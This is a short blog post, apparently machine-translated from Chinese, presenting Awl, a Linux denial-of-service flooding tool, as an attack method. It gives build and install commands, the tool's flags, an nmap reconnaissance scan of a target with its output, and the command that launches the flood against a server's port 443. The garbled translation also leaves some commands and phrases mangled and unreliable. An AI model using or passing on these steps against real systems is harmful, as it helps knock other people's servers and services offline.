Awl Introduction:
The reason why so many beans is because this method is really give force, value this price. Below is the attack step, the attachment is Awl source package. One, install: TAR-ZXVF awl-0.2.tar.gz./configuremake make installawl after the execution program is installed ...
The reason why so many beans is because this method is really give force, value this price. Below is the attack step, the attachment is Awl source package.
One, install:
TAR-ZXVF awl-0.2.tar.gz
./configure
Make
Make install
Note: If the compilation is not correct, follow the prompts to install the required software, such as: gcc-c++
Awl the execution of the program after installation in the/usr/local/bin/directory
Two, Description:
The AWL format is as follows:
./awl-i eth0-m aa:bb:cc:dd:ee:ff-d ip-p Port
The parameters are as follows:
-I sends the interface of the package, if omitted the default is Eth0
-M is attacked the MAC address of the machine, the program can not get the Mac according to the attack IP, need to be manually specified. Ping the target IP first, then arp-a. FF:FF:FF:FF:FF:FF if omitted
-d The IP of the attacked machine
-P is the port of the attacking machine.
Three, Test,
Server side: CentOS 5.0
Offset server: FreeBSD 6.2 running Apache
1, first know the other IP
Run Nmap-v-A 192.168.0.1 to see what service the other party is doing
[Email protected] bin]# nmap-v-A 10.122.89.106
Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2008-06-02 19:24 CST
DNS resolution of 1 IPs took 0.39s.
Initiating SYN Stealth Scan against 10.122.89.106 [1680 ports] at 19:24
Discovered open port 21/tcp on 10.122.89.106
Discovered open port 25/tcp on 10.122.89.106
Discovered open port 22/tcp on 10.122.89.106
Discovered open port 443/tcp on 10.122.89.106
Discovered open port 80/tcp on 10.122.89.106
Discovered open port 199/tcp on 10.122.89.106
Discovered open port 110/tcp on 10.122.89.106
Discovered open port 143/tcp on 10.122.89.106
Discovered open port 3306/tcp on 10.122.89.106
To know that the other side opened as the upper mouth
Ping 192.168.0.1 learns MAC address
View Arp-a the MAC address of the other IP
2. Start the attack:
./awl-i eth0-m aa:bb:cc:dd:ee:ff-d 192.168.0.1-p 443
Ping 192.168.0.1-t Check the reaction.
This article from the "System and Security Technology" blog, reproduced please contact the author!
Introduction to DOS Software Awl under Linux